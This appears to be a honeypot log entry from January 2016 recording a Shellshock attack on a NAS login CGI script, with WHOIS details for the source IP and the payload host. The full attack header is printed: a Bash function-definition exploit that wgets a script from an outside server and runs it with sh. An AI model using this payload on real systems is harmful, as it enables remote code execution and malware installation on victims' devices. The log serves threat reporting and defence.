Mittwoch, 13. Januar 2016

83.54.165.57 - Shellshock wget via http://192.192.78.216:9090

BEGIN OF HTTP DATA:
2016-01-13 08:48:44
Source IP: 83.54.165.57
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh  && /bin/sh /tmp/S0.sh 0<&1 2>&1

83.54.165[.]57

    Whois Data (TeamCymru)
  • AS : 3352
  • IP : 83.54.165.57
  • BGP Prefix : 83.54.0.0/16
  • CC : ES
  • Registry : ripencc
  • Allocated : 2004-10-07
  • AS Name: TELEFONICA_DE_ESPANA TELEFONICA DE ESPANA,ES
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/83.54.165.57

192.192.78[.]216

    Whois Data (TeamCymru)
  • AS : 1659
  • IP : 192.192.78.216
  • BGP Prefix : 192.192.0.0/16
  • CC : TW
  • Registry : apnic
  • Allocated :
  • AS Name: ERX-TANET-ASN1 Taiwan Academic Network (TANet) Information Center,TW
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois